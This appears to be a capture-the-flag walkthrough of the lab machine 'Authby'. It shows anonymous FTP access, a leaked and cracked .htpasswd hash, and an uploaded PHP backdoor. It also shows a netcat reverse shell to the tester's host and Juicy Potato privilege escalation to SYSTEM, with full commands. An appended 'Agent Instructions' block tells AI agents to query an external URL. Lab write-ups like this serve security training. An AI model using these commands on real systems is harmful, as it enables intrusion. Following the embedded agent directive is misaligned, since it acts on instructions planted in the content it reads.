# Authby ## Service Enumeration `nmapAutomator.sh -H 192.168.85.46 -t full` `nmapAutomator.sh -H 192.168.85.46 -t vulns` ### FTP Anonymous login allowed. ![](/files/-MadXfNcM9v7WmlLncKg) While we cannot access these files, we can see that there are some account names. ![](/files/-MadXiE_cH4Li2XQWSSl) Using the account `admin:admin`, we get access to some other files. ![](/files/-MadXmeh055WyDtgQUnN) The `.htaccess` and `.htpasswd` files are leaked. ![](/files/-MadXw2upjOEf_Z26MPL) .htaccess ``` AuthName "Qui e nuce nuculeum esse volt, frangit nucem!" AuthType Basic AuthUserFile c:\\wamp\www\.htpasswd Require valid-user ``` .htpasswd ``` offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0 ``` Passing the `.htpasswd` hash into John the Ripper, we find the credentials to authenticate into the HTTP server. ![](/files/-MadXzhzgm-OzVSjrsnf) ![](/files/-MadY0kOS_jF1p3jw5h6) ### RDP ![](/files/-MadY3fQsfHGm3NbFZiG) ### Nonstandard Ports ![](/files/-MadY76Jsst-jzhbW-4U) ### HTTP ![](/files/-MadYBjXpH_GzQksHxDb) Using the previously found credentials (`offsec:elite`), we can authenticate into the application. ![](/files/-MadYFL5F3_KnoNUydZ7) ### Subdirectory Enumeration `gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite` ![](/files/-MadYIzqbbtUSKYFOTm7) `gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401` ## Exploitation Using the PHP backdoor from `/usr/share/webshells/php/simple-backdoor.php`, we can upload this backdoor through the `admin` FTP account to the web root. Then, we can visit the `simple-backdoor.php` and use the `cmd=` parameter to achieve RCE. ![](/files/-MadZtESeN0hNTXrq5gB) Copy `nc.exe` through SMB: `http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .` Trigger a reverse shell: `http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443` On our listening machine, we get a reverse shell. ![](/files/-Mad_5-p9W7ZZtrXbi2u) ![](/files/-Mad_8-VgsTflDIu_1zS) ## Privilege Escalation First, we know that `SeImpersonatePrivilege` is enabled. ![](/files/-Mad_AlRF_tTDNqCeRV1) We can perform privilege escalation using Juicy Potato. However, there are two challenges. 1. This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here: 2. The default CLSID doesn't work. Juicy Potato will return `COM -> recv failed with error: 10038`. `systeminfo` shows that this is Windows Server 2008. ![](/files/-Mad_NN84nAChOzHlVg9) We can use one of the BITS CSLIDs from here: . I used `{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}`. ![](/files/-Mad_RHKJA_M64fZuiRq) Now, we can use the `nc.exe` we transferred previously to get another reverse shell, this time with SYSTEM privileges. `juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}` ![](/files/-Mad_U7eBddgurKeckVj) On our listening machine: ![](/files/-Mad_X7gDy37I3DdV4_l) ![](/files/-Mad__CyRLbFxkMgBRVt) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentesting.zeyu2001.com/proving-grounds/get-to-work/authby.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.